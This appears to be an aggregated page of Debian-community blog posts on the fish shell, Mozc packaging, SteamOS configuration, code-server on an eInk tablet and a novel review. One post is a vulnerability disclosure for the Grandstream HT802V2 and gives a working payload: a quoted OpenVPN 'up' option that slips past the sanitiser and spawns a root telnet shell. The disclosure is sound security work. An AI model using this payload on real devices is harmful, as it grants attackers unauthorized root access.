Search Results: "lowe"

28 February 2025

Antoine Beaupr : testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer that you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millenia). My normal shell is bash(1), and it's still the shell I used everywhere else than my laptop, as I haven't switched on all the servers I managed, although it is available since August 2022 on torproject.org servers. I first got interested in fish because they ported to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 year of work with Fish 4.0.

Cool things Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland Autocompletion rocks. Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. Made me realized that if the last command succeeds, we don't see other failures, which is the case of my current prompt anyways! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell. By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd, dirh shows the history.

Less cool I feel there's visible latency in the prompt creation. POSIX-style functions (foo() true ) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
This means my (modest) collection of POSIX functions need to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions). EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful. Process substitution is split on newlines, not whitespace. you need to pipe through string split -n " " to get the equivalent. <(cmd) doesn't exist: they claim you can use cmd foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'. Documentation is... limited. It seems mostly geared the web docs which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!) Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg   wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue. I have already filed it upstream in foot and it is apparently fixed already. Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025, it will send the string 202[345] to the command.

Blockers () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py )   sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end   sort -ub
It... works, but it goes back to "oh dear, now there's a new langage again". I only found out about this construct while trying:
  git grep -l '^#!/.*bin/python' ; fdfind .py     sort -u 
... which fails and suggests using begin/end, at which point: why not just support the curly braces? FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from standard. Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges. alt . doesn't always work the way i expect.

23 February 2025

Kentaro Hayashi: Short journey to Mozc 2.29.5160.102+dfsg-1

Introduction This is just a note-taking about how to upgrading Mozc package for up-coming trixie ready (with many restrictions) last year. Maybe Mozc 2.29.5160.102+dfsg-1.3 will be shipped for Debian 13 (trixie).

FTBFS with Mozc 2.28.4715.102+dfsg-2.2 In May 2024, I've found that Mozc was removed from testing, and still in FTBFS. #1068186 - mozc: FTBFS with abseil 20230802: ../../base/init_mozc.cc:90:29: error: absl::debian5::flags_internal::ArgvListAction has not been declared - Debian Bug report logs That FTBFS was fixed in the Mozc upstream, but not applied for a while. Not only upstream patch, but also additional linkage patch was required to fix it. Mozc is the de-fact standard input method editor for Japanese. Most of Japanese uses it by default on linux desktop. (Even though frontend input method framework is different, the background engine is Mozc in most cases - uim-mozc for task-japanese-desktop, ibus-mozc for task-japanese-gnome-desktop in Debian) There is a case that Mozc was re-built locally with integrated external dictionary to improve quantity of vocabulary. If FTBFS keep ongoing, it means that it blocks such a usage. So I've sent patches to fix it and they were merged.

Motivation to update Mozc With fixing #1068186, I've also found Mozc version is not synced to upstream for a long time. At that time, Mozc in unstable was version 2.28.4715.102+dfsg, but upstream already released 2.30.5544.102. It seems that Mozc's maintainer was too busy and can't afford to update it, so I've tried to do it.

The blockers for updating Mozc But, it was not so easy task to do so. If you want to package latest Mozc, there were many blockers.
  • Newer Mozc requires Bazel to build, but there is no Bazel package to fit it (There is bazel-bootstrap 4.x, but it's old. v6.x or newer one is required.)
  • Newer abseil and protobuf were required
  • Renderer was changed to Qt. GTK renderer was removed
  • Revise existing patchsets (e.g. for UIM, for Fcitx)
It was not all.

Road to latest Mozc First, I knew the existence of debian-bazel, so I've posted about bazel-packaging progress. Any updates about bazel packaging effort? Sadly there was no response from it. Thus, it was not realistic to adopt Bazel as build tool chain. In other words, we need to keep GYP patch and maintain it. And as another topic, upstream changed renderer from GTK+ to Qt. Here are the major topics about each release of Mozc.
  • 2.30.5544.102 Require abseil 20240116.1 or later
  • 2.29.5544.102 GYP was deprecated
  • 2.29.5374.102
  • 2.29.5268.102 No gtk renderer anymore, need Qt.
  • 2.29.5160.102
    • The last version that gtk renderer is available.
    • --use_gyp_for_ibus_build option was removed.
  • 2.28.5029.102
  • 2.28.4880.102
  • 2.28.4715.102+dfsg Debian sid
The internal renderer change are too big, and before GYP deprecation in 2.29.5544.102, GYP support was already removed gradually. As a result, target to 2.29.5160.102 was the practical approach to make it forward.

Revisit existing patchsets for 2.28.4715.102+dfsg Second, need to revisit existing patchset to triage them.
  • 0001-Update-uim-mozc-to-c979f127acaeb7b35d3344e8b1e40848e.patch
    • Required
  • 0002-Support-fcitx.patch
    • Required
  • 0003-Change-compiler-from-clang-to-gcc.patch
  • 0004-Add-usage_dict.txt.patch
    • Required. (maybe)
  • 0005-Enable-verbose-build.patch
    • Required.
  • 0006-Update-gyp-using-absl.patch
    • Required and need massive refactoring.
  • 0007-common.gypi-Use-command-v-instead-of-which.patch
    • (maybe) Not needed anymore
  • 0009-protobuf.gyp-Add-latomic-to-link_settings.patch
    • Required.
  • 0010-Fix-the-compile-error-of-ParseCommandLineFlags-with.patch
    • Required. Should be merged into 0006 patch.
  • 0011-Fix-missing-abseil-gyp-link-settings.patch
    • Required. Should be merged into 0006 patch.
UIM patch was maintained in third-party repository, and directory structure was quite different from Mozc. It seems that maintenance activity was too low, so it was not enough that picking changes from macuim. It was required to fix FTBFS additionally. Fcitx patch was also maintained in fcitx/mozc. But it tracks only master branch, so it was hard to pick patchset for specific version of Mozc. Finally, I could manage to refresh patchset for 2.29.5160.102.
  • support-uim.patch
  • support-fcitx.patch
  • change-compiler-from-clang-to-gcc.patch
  • add-japanese-usage-dictionary.patch
  • enable-verbose-build.patch
  • update-gyp-using-system-abseil.patch
  • gyp-using-command-instead-of-which.patch
  • gyp-protobuf-link-with-atomic.patch
  • enable-deprecated-gtk-renderer.patch
  • fix-compile-error-of-ParseCommandLineFlags.patch
  • enable-use_gyp_for_ibus_build-again.patch
  • ibus-drop-needless-client_mock.patch
  • protobuf-revert-internal-cleanup.patch
  • uim-mozc-fix-ftbfs.patch

Improve packaging task Mozc need to be repacked, but it didn't use Files-Excluded yet. So I've introduced d/watch to repack upstream source. It makes source package more reproducible.

OT: Hardware breakage There was another blocker to do this task. I've hit the situation that g++ cause SEGV during building Mozc randomly. First, I wonder why it fails, but digging further more, finally I've found that memory module was corrupted. Thus I've lost 32GB memory modules. :-<

Unexpected behaviour in uim-mozc When uploaded Mozc 2.29.5160.102+dfsg-1 to experimental, I've found that there is a case that uim-mozc behaves weird. The candidate words were shown with flickering. But it was not regression in this upload. uim-mozc with Wayland cause that problem. Thus GNOME and derivatives might not be affected because ibus-mozc will be used.

Mozc 2.29.5160.102+dfsg-1 As the patchset was matured, then uploaded 2.29.5160.102+dfsg-1 with --delayed 15 option.
$ dput --delayed 15 mozc_2.29.5160.102+dfsg-1_source.changes
Uploading mozc using ftp to ftp-master (host: ftp.upload.debian.org; directory: /pub/UploadQueue/DELAYED/15-day)
running allowed-distribution: check whether a local profile permits uploads to the target distribution
running protected-distribution: warn before uploading to distributions where a special policy applies
running checksum: verify checksums before uploading
running suite-mismatch: check the target distribution for common errors
running gpg: check GnuPG signatures before the upload
 signfile dsc mozc_2.29.5160.102+dfsg-1.dsc 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_buildinfo mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
 signfile buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
 fixup_changes dsc mozc_2.29.5160.102+dfsg-1.dsc mozc_2.29.5160.102+dfsg-1_source.changes
 fixup_changes buildinfo mozc_2.29.5160.102+dfsg-1_amd64.buildinfo mozc_2.29.5160.102+dfsg-1_source.changes
 signfile changes mozc_2.29.5160.102+dfsg-1_source.changes 719EB2D93DBE9C4D21FBA064F7FB75C566ED20E3
Successfully signed dsc, buildinfo, changes files
Uploading mozc_2.29.5160.102+dfsg-1.dsc
Uploading mozc_2.29.5160.102+dfsg-1.debian.tar.xz
Uploading mozc_2.29.5160.102+dfsg-1_amd64.buildinfo
Uploading mozc_2.29.5160.102+dfsg-1_source.changes
Mozc 2.29.5160.102+dfsg-1 was landed to unstable at 2024-12-20.

Additional bug fixes Additionally, the following bugs were also fixed. These bugs were fixed in 2.29.5160.102+dfsg-1.1 And more, I've found that even though missing pristine-tar branch commit, salsa CI succeeds. I've sent MR for this issue and already merged into.

Mozc and future in Debian In this short journey, I gave up to updating more newer Mozc because the version of dependency libraries were not updated. Note that protobuf 3.25.4 on experimental depends on older absl 20230802, so it must be rebuilt against absl 20240722.0. And more, we need to consider how to migrate from GTK renderer to Qt renderer in the future.

12 February 2025

Evgeni Golov: Authenticated RCE via OpenVPN Configuration File in Grandstream HT802V2 and probably others

I have a Grandstream HT802V2 running firmware 1.0.3.5 and while playing around with the VPN settings realized that the sanitization of the "Additional Options" field done for CVE-2020-5739 is not sufficient. Before the fix for CVE-2020-5739, /etc/rc.d/init.d/openvpn did
echo "$(nvram get 8460)"   sed 's/;/\n/g' >> $ CONF_FILE 
After the fix it does
echo "$(nvram get 8460)"   sed -e 's/;/\n/g'   sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> $ CONF_FILE 
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefor sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab neither via the web interface, nor via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this still will be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
Affected devices Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)"   sed -e 's/;/\n/g' \
                           sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> $ CONF_FILE 
So far I was unable to inject any further commands in this block. Timeline

10 February 2025

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stand alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

5 February 2025

Alberto Garc a: Keeping your system-wide configuration files intact after updating SteamOS

Introduction If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update. However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it s a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc). /etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don t conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update. SteamOS 3.6 introduced a new mechanism to decide what to to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded1. However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
  1. A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup

2 February 2025

Joachim Breitner: Coding on my eInk Tablet

For many years I wished I had a setup that would allow me to work (that is, code) productively outside in the bright sun. It s winter right now, but when its summer again it s always a bit. this weekend I got closer to that goal. TL;DR: Using code-server on a beefy machine seems to be quite neat.
Passively lit coding Passively lit coding

Personal history Looking back at my own old blog entries I find one from 10 years ago describing how I bought a Kobo eBook reader with the intent of using it as an external monitor for my laptop. It seems that I got a proof-of-concept setup working, using VNC, but it was tedious to set up, and I never actually used that. I subsequently noticed that the eBook reader is rather useful to read eBooks, and it has been in heavy use for that every since. Four years ago I gave this old idea another shot and bought an Onyx BOOX Max Lumi. This is an A4-sized tablet running Android and had the very promising feature of an HDMI input. So hopefully I d attach it to my laptop and it just works . Turns out that this never worked as well as I hoped: Even if I set the resolution to exactly the tablet s screen s resolution I got blurry output, and it also drained the battery a lot, so I gave up on this. I subsequently noticed that the tablet is rather useful to take notes, and it has been in sporadic use for that. Going off on this tangent: I later learned that the HDMI input of this device appears to the system like a camera input, and I don t have to use Boox s monitor app but could other apps like FreeDCam as well. This somehow managed to fix the resolution issues, but the setup still wasn t as convenient to be used regularly. I also played around with pure terminal approaches, e.g. SSH ing into a system, but since my usual workflow was never purely text-based (I was at least used to using a window manager instead of a terminal multiplexer like screen or tmux) that never led anywhere either.

VSCode, working remotely Since these attempts I have started a new job working on the Lean theorem prover, and working on or with Lean basically means using VSCode. (There is a very good neovim plugin as well, but I m using VSCode nevertheless, if only to make sure I am dogfooding our default user experience). My colleagues have said good things about using VSCode with the remote SSH extension to work on a beefy machine, so I gave this a try now as well, and while it s not a complete game changer for me, it does make certain tasks (rebuilding everything after a switching branches, running the test suite) very convenient. And it s a bit spooky to run these work loads without the laptop s fan spinning up. In this setup, the workspace is remote, but VSCode still runs locally. But it made me wonder about my old goal of being able to work reasonably efficient on my eInk tablet. Can I replicate this setup there? VSCode itself doesn t run on Android directly. There are project that run a Linux chroot or in termux on the Android system, and then you can VNC to connect to it (e.g. on Andronix) but that did not seem promising. It seemed fiddly, and I probably should take it easy on the tablet s system.

code-server, running remotely A more promising option is code-server. This is a fork of VSCode (actually of VSCodium) that runs completely on the remote machine, and the client machine just needs a browser. I set that up this weekend and found that I was able to do a little bit of work reasonably.

Access With code-server one has to decide how to expose it safely enough. I decided against the tunnel-over-SSH option, as I expected that to be somewhat tedious to set up (both initially and for each session) on the android system, and I liked the idea of being able to use any device to work in my environment. I also decided against the more involved reverse proxy behind proper hostname with SSL setups, because they involve a few extra steps, and some of them I cannot do as I do not have root access on the shared beefy machine I wanted to use. That left me with the option of using a code-server s built-in support for self-signed certificates and a password:
$ cat .config/code-server/config.yaml
bind-addr: 1.2.3.4:8080
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: true
With trust-on-first-use this seems reasonably secure. Update: I noticed that the browsers would forget that I trust this self-signed cert after restarting the browser, and also that I cannot install the page (as a Progressive Web App) unless it has a valid certificate. But since I don t have superuser access to that machine, I can t just follow the official recommendation of using a reverse proxy on port 80 or 431 with automatic certificates. Instead, I pointed a hostname that I control to that machine, obtained a certificate manually on my laptop (using acme.sh) and copied the files over, so the configuration now reads as follows:
bind-addr: 1.2.3.4:3933
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.cer
cert-key: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.key
(This is getting very specific to my particular needs and constraints, so I ll spare you the details.)

Service To keep code-server running I created a systemd service that s managed by my user s systemd instance:
~ $ cat ~/.config/systemd/user/code-server.service
[Unit]
Description=code-server
After=network-online.target
[Service]
Environment=PATH=/home/joachim/.nix-profile/bin:/nix/var/nix/profiles/default/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ExecStart=/nix/var/nix/profiles/default/bin/nix run nixpkgs#code-server
[Install]
WantedBy=default.target
(I am using nix as a package manager on a Debian system there, hence the additional PATH and complex ExecStart. If you have a more conventional setup then you do not have to worry about Environment and can likely use ExecStart=code-server. For this to survive me logging out I had to ask the system administrator to run loginctl enable-linger joachim, so that systemd allows my jobs to linger.

Git credentials The next issue to be solved was how to access the git repositories. The work is all on public repositories, but I still need a way to push my work. With the classic VSCode-SSH-remote setup from my laptop, this is no problem: My local SSH key is forwarded using the SSH agent, so I can seamlessly use that on the other side. But with code-server there is no SSH key involved. I could create a new SSH key and store it on the server. That did not seem appealing, though, because SSH keys on Github always have full access. It wouldn t be horrible, but I still wondered if I can do better. I thought of creating fine-grained personal access tokens that only me to push code to specific repositories, and nothing else, and just store them permanently on the remote server. Still a neat and convenient option, but creating PATs for our org requires approval and I didn t want to bother anyone on the weekend. So I am experimenting with Github s git-credential-manager now. I have configured it to use git s credential cache with an elevated timeout, so that once I log in, I don t have to again for one workday.
$ nix-env -iA nixpkgs.git-credential-manager
$ git-credential-manager configure
$ git config --global credential.credentialStore cache
$ git config --global credential.cacheOptions "--timeout 36000"
To login, I have to https://github.com/login/device on an authenticated device (e.g. my phone) and enter a 8-character code. Not too shabby in terms of security. I only wish that webpage would not require me to press Tab after each character This still grants rather broad permissions to the code-server, but at least only temporarily

Android setup On the client side I could now open https://host.example.com:8080 in Firefox on my eInk Android tablet, click through the warning about self-signed certificates, log in with the fixed password mentioned above, and start working! I switched to a theme that supposedly is eInk-optimized (eInk by Mufanza). It s not perfect (e.g. git diffs are unhelpful because it is not possible to distinguish deleted from added lines), but it s a start. There are more eInk themes on the official Visual Studio Marketplace, but because code-server is a fork it cannot use that marketplace, and for example this theme isn t on Open-VSX. For some reason the F11 key doesn t work, but going fullscreen is crucial, because screen estate is scarce in this setup. I can go fullscreen using VSCode s command palette (Ctrl-P) and invoking the command there, but Firefox often jumps out of the fullscreen mode, which is annoying. I still have to pay attention to when that s happening; maybe its the Esc key, which I am of course using a lot due to me using vim bindings. A more annoying problem was that on my Boox tablet, sometimes the on-screen keyboard would pop up, which is seriously annoying! It took me a while to track this down: The Boox has two virtual keyboards installed: The usual Google ASOP keyboard, and the Onyx Keyboard. The former is clever enough to stay hidden when there is a physical keyboard attached, but the latter isn t. Moreover, pressing Shift-Ctrl on the physical keyboard rotates through the virtual keyboards. Now, VSCode has many keyboard shortcuts that require Shift-Ctrl (especially on an eInk device, where you really want to avoid using the mouse). And the limited settings exposed by the Boox Android system do not allow you configure that or disable the Onyx keyboard! To solve this, I had to install the KISS Launcher, which would allow me to see more Android settings, and in particular allow me to disable the Onyx keyboard. So this is fixed. I was hoping to improve the experience even more by opening the web page as a Progressive Web App (PWA), as described in the code-server FAQ. Unfortunately, that did not work. Firefox on Android did not recognize the site as a PWA (even though it recognizes a PWA test page). And I couldn t use Chrome either because (unlike Firefox) it would not consider a site with a self-signed certificate as a secure context, and then code-server does not work fully. Maybe this is just some bug that gets fixed in later versions. Now that I use a proper certificate, I can use it as a Progressive Web App, and with Firefox on Android this starts the app in full-screen mode (no system bars, no location bar). The F11 key still does t work, and using the command palette to enter fullscreen does nothing visible, but then Esc leaves that fullscreen mode and I suddenly have the system bars again. But maybe if I just don t do that I get the full screen experience. We ll see. I did not work enough with this yet to assess how much the smaller screen estate, the lack of colors and the slower refresh rate will bother me. I probably need to hide Lean s InfoView more often, and maybe use the Error Lens extension, to avoid having to split my screen vertically. I also cannot easily work on a park bench this way, with a tablet and a separate external keyboard. I d need at least a table, or some additional piece of hardware that turns tablet + keyboard into some laptop-like structure that I can put on my, well, lap. There are cases for Onyx products that include a keyboard, and maybe they work on the lap, but they don t have the Trackpoint that I have on my ThinkPad TrackPoint Keyboard II, and how can you live without that?

Conclusion After this initial setup chances are good that entering and using this environment is convenient enough for me to actually use it; we will see when it gets warmer. A few bits could be better. In particular logging in and authenticating GitHub access could be both more convenient and more safe I could imagine that when I open the page I confirm that on my phone (maybe with a fingerprint), and that temporarily grants access to the code-server and to specific GitHub repositories only. Is that easily possible?

31 January 2025

Divine Attah-Ohiemi: Seeking Opportunities: Building a Career in Software Engineering and Beyond

